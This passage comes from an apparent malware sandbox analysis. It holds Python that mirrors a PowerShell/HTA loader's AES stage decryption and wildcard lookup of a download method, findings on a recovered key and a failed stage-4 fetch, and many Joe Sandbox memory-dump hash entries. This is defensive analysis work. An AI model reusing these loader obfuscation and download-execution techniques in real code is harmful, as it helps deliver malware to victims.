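        "iv": bytes(iv_len),                            # all-zero IV
        "verb_len": verb_len,      # chars the '&' runs as a command (plaintext not on the page)
        "body_offset": body_off,   # rest of the plaintext is passed as its argument
    }


def decrypt_stage3(ciphertext: bytes, params: dict) -> tuple[str, str]:
    """Mirror the decryptor and the final '& verb body' split without running it.

    Assumption: the third-party 'cryptography' package is installed. Not
    exercised here because the report does not contain the ciphertext.
    """
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(params["key"]), modes.CBC(params["iv"])).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    plain = (unpad.update(padded) + unpad.finalize()).decode("latin-1")
    return plain[:params["verb_len"]], plain[params["body_offset"]:]


# Stage 4 picks the WebClient method by wildcard instead of naming it:
#   ([Net.WebClient]::New() | Get-Member | Where-Object {$_.Name -ilike '*wn*d*g'}).Name
# Constructed subset of System.Net.WebClient member names (assumption), enough
# to show that the pattern selects exactly one member.
WEBCLIENT_MEMBERS = [
    "BaseAddress", "CancelAsync", "Credentials", "DownloadData", "DownloadDataAsync",
    "DownloadDataCompleted", "DownloadFile", "DownloadFileAsync", "DownloadProgressChanged",
    "DownloadString", "DownloadStringAsync", "DownloadStringCompleted", "Encoding",
    "Headers", "OpenRead", "OpenWrite", "UploadData", "UploadFile", "UploadString", "UploadValues",
]


def resolve_like(pattern: str, members=WEBCLIENT_MEMBERS) -> list[str]:
    """Emulate PowerShell's case-insensitive -ilike wildcard match."""
    return [m for m in members if fnmatch.fnmatchcase(m.lower(), pattern.lower())]


if __name__ == "__main__":
    print(decode_hta_chunk())
    print(stage3_parameters())
    print(resolve_like("*wn*d*g"))
```

Decoding the captured chunk yields the opening of the HTA's own decoder, `function jxyQjt(hhVWS){var gafQjq= '';for (var WIaGf = 0;WIaGf < hhVWS.length; WIaGf+`, so the next layer is again a character-by-character transform of a literal embedded further down the body. The key recovered from the stage-3 command line is `yJWBGoszjenTRFsK`, and `*wn*d*g` resolves only to `DownloadString`. Note that the stage-4 fetch of madonna.vstx got a Cloudflare 521 (origin unreachable) in this run, so the final payload was never delivered and is not in the report.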
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1686788617.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b7c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                • Instruction ID: 995c809a1818668ffa22beee52c015c350a696e0f72191c51961a08a26fb3fe4
                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                • Instruction Fuzzy Hash: 7701A73020CB0C4FD748EF0CE051AB5B3E0FB85320F10066DE58AC36A1DA32E882CB41
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1777932681.000001C9A3932000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A3932000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a3932000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fe8877f45f07e580984cde4812ab08e73c41dd0c5788fff79519b8e56018482
                                                • Instruction ID: 9a33fe773c3071641017694f6b65fecd7109b691d9b3741ca8eac66a25f6afaf
                                                • Opcode Fuzzy Hash: 4fe8877f45f07e580984cde4812ab08e73c41dd0c5788fff79519b8e56018482
                                                • Instruction Fuzzy Hash: E4110C7055EB844FF78A9538943D7B83AD1EF86351F0A00EFD092C71E2E898CC858351
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1772625677.00007FFD9AFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AFC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9afc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction ID: 55680e5028829cb3ed2c505caeef5560b6d9b07114ecce0f8a915fb853b08f08
                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction Fuzzy Hash: F401A73120CB0C8FD748EF0CE051AA5B3E0FB89364F10066DE58AC3691D632E891CB41
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1773176819.00007FFD9B090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9b090000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 561c4c09c6762ff71ad5e4796e301880a5f23334e2d8b443fd9b78e0bf87d116
                                                • Instruction ID: 61414bb8594327512c90a7c2751d01c23b0029ce3b663f8b3281743a6181c5be
                                                • Opcode Fuzzy Hash: 561c4c09c6762ff71ad5e4796e301880a5f23334e2d8b443fd9b78e0bf87d116
                                                • Instruction Fuzzy Hash: E4E09223B0E82D0EEBA1A59828291B96281DF55A2170901B6E91DE2191ED04A8205281
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-1420252700
                                                • Opcode ID: 1b9c2d48c4bede64b962f3b2ef78be4c5179abbba6008798038a37a0871db590
                                                • Instruction ID: 7c1bf1423df4e049ee5037628244f0312d2a4821ec5f0d2161a6441008776f49
                                                • Opcode Fuzzy Hash: 1b9c2d48c4bede64b962f3b2ef78be4c5179abbba6008798038a37a0871db590
                                                • Instruction Fuzzy Hash: 802247F1B083859FE7159B688811A6ABBE2EFC2310F1584EAD415CF391DB32DC45D7A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                • API String ID: 0-2049395529
                                                • Opcode ID: e9128c25d60d2409df50907a28a8c4c3f2c723ea0879ea74cc0ed456393cdb7c
                                                • Instruction ID: 28aaf66f74f5becae5cfed2ae0cfc22e99030f3de36a76538e0bc0fcbed64657
                                                • Opcode Fuzzy Hash: e9128c25d60d2409df50907a28a8c4c3f2c723ea0879ea74cc0ed456393cdb7c
                                                • Instruction Fuzzy Hash: 6F21BAF5B0010DDFEB259A5DD4486BEB3A2EBC5210F24C4ABD9268B254DB32C946C762
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q
                                                • API String ID: 0-2697143702
                                                • Opcode ID: c7bf27912804670e3c32632d62d7767f63700bf5c200c4a0544b2e146f8eeccd
                                                • Instruction ID: 7dddc8616a6bf562821ad95f46b676b4484dc727b592556e96f0aa6ba91a9d12
                                                • Opcode Fuzzy Hash: c7bf27912804670e3c32632d62d7767f63700bf5c200c4a0544b2e146f8eeccd
                                                • Instruction Fuzzy Hash: 7D215FF17443868FEB154A7854112B6BBA2DFC2212F1484FBC429CF295EF32C895C791
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1773048135.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_50b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4766438754b81bda13033b2d7be52d5a3aaa9c89aa4b1ff315e5a78b7ec627d0
                                                • Instruction ID: 16e1eafd264dfcdeccdb59c19b597948a0d9c47861dc31656ca4cb7c9b9a806b
                                                • Opcode Fuzzy Hash: 4766438754b81bda13033b2d7be52d5a3aaa9c89aa4b1ff315e5a78b7ec627d0
                                                • Instruction Fuzzy Hash: 20D18974A0464A9FCB05CF59C4D49BEBBB1FF48310B24869AD815AB365C735FC51CBA0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb28466f8d8b91f821099990eb8a21ec1c5038400d82e0be33d9ed8a2daf142b
                                                • Instruction ID: abb3b9de51c48dec54ae4949a64508e476cb976d5b8427c01169f816680128cb
                                                • Opcode Fuzzy Hash: bb28466f8d8b91f821099990eb8a21ec1c5038400d82e0be33d9ed8a2daf142b
                                                • Instruction Fuzzy Hash: C74129F1A04382EFEB158F288841B697BF2EF81301F1980E6D9109F692D736DD44DB62
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1773048135.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_50b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7534258dfde3a1c9849d4a458bb5492734ee16dc868751c57f6cd0e0dcb1dd9
                                                • Instruction ID: fd4e6f98de63ca5f9bcfe51a8e95f2709e46ff4b423d9861c4e1e7c76a6991d6
                                                • Opcode Fuzzy Hash: b7534258dfde3a1c9849d4a458bb5492734ee16dc868751c57f6cd0e0dcb1dd9
                                                • Instruction Fuzzy Hash: 654113B8A005069FDB09CF59D594AFEBBB1FF48310B11859AD506AB264C736BC50CBA4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1771648347.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_342d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3db7c49c963dfe19c021c3742dbd6ead52f0aac0b92dbb2b7fd959325440b40c
                                                • Instruction ID: bb3f586d17b8c99f3b3f945ea5ddd67800082cf754cecdf4058cdf0a730d7b7a
                                                • Opcode Fuzzy Hash: 3db7c49c963dfe19c021c3742dbd6ead52f0aac0b92dbb2b7fd959325440b40c
                                                • Instruction Fuzzy Hash: 0301407140E3C09ED7128B25C894B52BFB8EF47224F1DC5DBD9989F2A3C2699845C772
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1771648347.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_342d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f814c0ab30f6eedff8f73e0a8d3a2ffc6fdcaae5949890844d5953bce4111b55
                                                • Instruction ID: 0a2d5c81bcc2b5af0b5a94444c01b069320e0f3e1e64f98a0c5d393a41519a41
                                                • Opcode Fuzzy Hash: f814c0ab30f6eedff8f73e0a8d3a2ffc6fdcaae5949890844d5953bce4111b55
                                                • Instruction Fuzzy Hash: C201F7718083109AE710CA25CD84767FF9CEF42328F0CC56BED686E256C279D842C6B5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1773048135.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_50b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 991d5736766994d01d35fd3984fce9ce168f72d251c5178a45271cc29027917e
                                                • Instruction ID: 2cbdf7df175839366e85b5422ad64a2ecc8590fe2ead3cea2de9f8759e434d0f
                                                • Opcode Fuzzy Hash: 991d5736766994d01d35fd3984fce9ce168f72d251c5178a45271cc29027917e
                                                • Instruction Fuzzy Hash: 72F09674E00104DFCB14CF99D8945ADF7B5FFC8310B248499D955A7751CB36AC52CB80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$cl$cl$cl$cl
                                                • API String ID: 0-2708587798
                                                • Opcode ID: 6e5a83c8556d471318489f9dd244575a91011fec747adca6416b4a025d1629ab
                                                • Instruction ID: baf8cbf7833c70b1b0b7745b0e43bbdf5e13eedec5754a9318055d4a0f0c8c51
                                                • Opcode Fuzzy Hash: 6e5a83c8556d471318489f9dd244575a91011fec747adca6416b4a025d1629ab
                                                • Instruction Fuzzy Hash: 48F115B5B042058FEB259F6898016AABBF2FFC5310F1884BAD865CB351DB32DC45C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$tP^q$tP^q$#]k$$^q$$^q$$^q$cl$cl
                                                • API String ID: 0-1313113490
                                                • Opcode ID: b6b3ff0c82ed74dd01fcf057f7b129794d953ca9c87e7ae73f8a6bb62a6f0dd6
                                                • Instruction ID: 33b4ae327188160f3a4b9b7d986d50c9d549af0624e39d38ee463f5f775fff82
                                                • Opcode Fuzzy Hash: b6b3ff0c82ed74dd01fcf057f7b129794d953ca9c87e7ae73f8a6bb62a6f0dd6
                                                • Instruction Fuzzy Hash: A1A124F270825D8FE7258ABD9400666BBE5EFC6210B1984EBD425CF3A1DA32DC45C7B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q
                                                • API String ID: 0-696367261
                                                • Opcode ID: f0419543940b21daa04ae246b88657bea56a1a453d2e9f63b8fa9f5b334d9d31
                                                • Instruction ID: 78c91ddf54654af7446f5442a424644c7b23f382391328b6aeef4d53c5ef48fc
                                                • Opcode Fuzzy Hash: f0419543940b21daa04ae246b88657bea56a1a453d2e9f63b8fa9f5b334d9d31
                                                • Instruction Fuzzy Hash: 5AE126F1B043468FE7258B6898117EABFF2FF86310F1484EAD565CB252DA31C885C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$XRml$XRml$XRml$1]k$rml$rml
                                                • API String ID: 0-828692184
                                                • Opcode ID: fa80215b0a6e03121fa1e9941a4b6de55c7834757435041041bcd3fc7fceadda
                                                • Instruction ID: 5f585dcaf098d3202eb8534d07abdfbc1a1be1fab5c083b4615c4d36e9c3fc7b
                                                • Opcode Fuzzy Hash: fa80215b0a6e03121fa1e9941a4b6de55c7834757435041041bcd3fc7fceadda
                                                • Instruction Fuzzy Hash: 1FB146F1B043468FEB15AB7898106AABFE2EF86210F1580EBD555CF392DB31D845C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$x.^k$-^k
                                                • API String ID: 0-3490158111
                                                • Opcode ID: 5fc3765c9771aae464689b20b5b323def224e5f536d025cc69f164f7ed4857f4
                                                • Instruction ID: 88edde8e61e8f2ced04480797d34d7bec2c65b0cf10a17b5fbfccea5a925ae02
                                                • Opcode Fuzzy Hash: 5fc3765c9771aae464689b20b5b323def224e5f536d025cc69f164f7ed4857f4
                                                • Instruction Fuzzy Hash: 49D19FB0A002099FEB04DB58D551B9EBBE3EBC8304F158568D5016F7A5CB71EC86CBA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q$$]k
• API String ID: 0-1527608752
• Opcode ID: f284009e49ec9e431564066cdb294bb7cda2a164f1cb4ef2ab293e853dccfee2
• Instruction ID: b250d3b4317beb22e704b00b7591ef6f8c78938e845fadacfa5ea8b5ecc130b8
• Opcode Fuzzy Hash: f284009e49ec9e431564066cdb294bb7cda2a164f1cb4ef2ab293e853dccfee2
• Instruction Fuzzy Hash: FB8126F1B1434D8FE7258A6C88017BABBB2ABC1311F1484AAD525DF2A1DB31DC45C7B2
Strings
Memory Dump Source
• Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$cl$cl
• API String ID: 0-2399376515
• Opcode ID: 4e01bb59044f392cd2e0d103627fbd416354c0ecdb5ee7ec12ba4e86b4473b5f
• Instruction ID: 4be53a0fb204755995ca0a8c9c1be4500cd3e36a227c878c0e6e78eace73ef38
• Opcode Fuzzy Hash: 4e01bb59044f392cd2e0d103627fbd416354c0ecdb5ee7ec12ba4e86b4473b5f
• Instruction Fuzzy Hash: 27119EB53043569BF7344D2AD805B67B7AAEFC0722F24C06AE869CB394CE31C845D390
Strings
Memory Dump Source
• Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$x.^k$-^k
• API String ID: 0-773919728
• Opcode ID: a052fa61dadcf2ec7a05e5851ac93817367c630d930275068435b345eb17e943
• Instruction ID: 9dd142f6e8994650fd9c83c6927aaa20838df63817ef13cc80163566c16509fb
• Opcode Fuzzy Hash: a052fa61dadcf2ec7a05e5851ac93817367c630d930275068435b345eb17e943
• Instruction Fuzzy Hash: 30A17BB4A00209DFEB14CB58D541BAEBBB2FB88304F158599D5056F7A5CB31EC86CBA1
Strings
Memory Dump Source
• Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$$^q
• API String ID: 0-2125118731
• Opcode ID: eb52d1714a8b96f5ca007c57bf8ab99d615521c57679547229ab23a2cd5a78da
• Instruction ID: 9ae687862eb5fb925440075a3cde93a52d890d78f87a9517d319b75167e276ac
• Opcode Fuzzy Hash: eb52d1714a8b96f5ca007c57bf8ab99d615521c57679547229ab23a2cd5a78da
• Instruction Fuzzy Hash: 8A2187F171028E5BF72409699808B23B6DADFC1716F2484AE9525CF380CD76C844C2A1
Strings
Memory Dump Source
• Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529
• Opcode ID: 933f0e21be10b717a4b37ffd6c22337d6c391a6f98ffe0ab209e9476506c4338
• Instruction ID: 1b8d8ab95f953ec4276a6fbbf63a6aa1fe0ed462dbd079cc626c2d6ef7ac3171
• Opcode Fuzzy Hash: 933f0e21be10b717a4b37ffd6c22337d6c391a6f98ffe0ab209e9476506c4338
• Instruction Fuzzy Hash: C901D6E1B0938A5FD32B222828201586FF25FD351076A04DBC091CF35ACD15CC49C766